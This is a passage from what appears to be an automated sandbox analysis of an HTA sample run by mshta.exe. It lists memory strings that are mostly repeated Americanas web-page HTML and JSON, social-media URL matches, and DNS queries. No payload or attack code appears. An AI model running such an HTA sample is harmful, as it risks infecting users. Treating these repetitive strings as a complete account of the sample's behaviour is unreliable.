","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: h,https://www.youtube.com/user/CanalAmericanasp equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas, equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas@9/ equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanasH equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2668398885.000000000A896000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774228317.000000000A8A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665365872.000000000A899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanasu equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanas equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727304462.000000000928A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770343155.000000000928C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/C equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727304462.000000000928A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770343155.000000000928C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/C equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, gtm[1].js.0.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000002.2777325534.000000000C359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000002.2777325534.000000000C359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769084191.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2136185209.0000000006542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}I equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}I equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}I equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}R equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}R equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}R equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.americanas.com.br
Source: global trafficDNS traffic detected: DNS query: images-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: statics-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: logs-referer.s3-sa-east-1.amazonaws.com
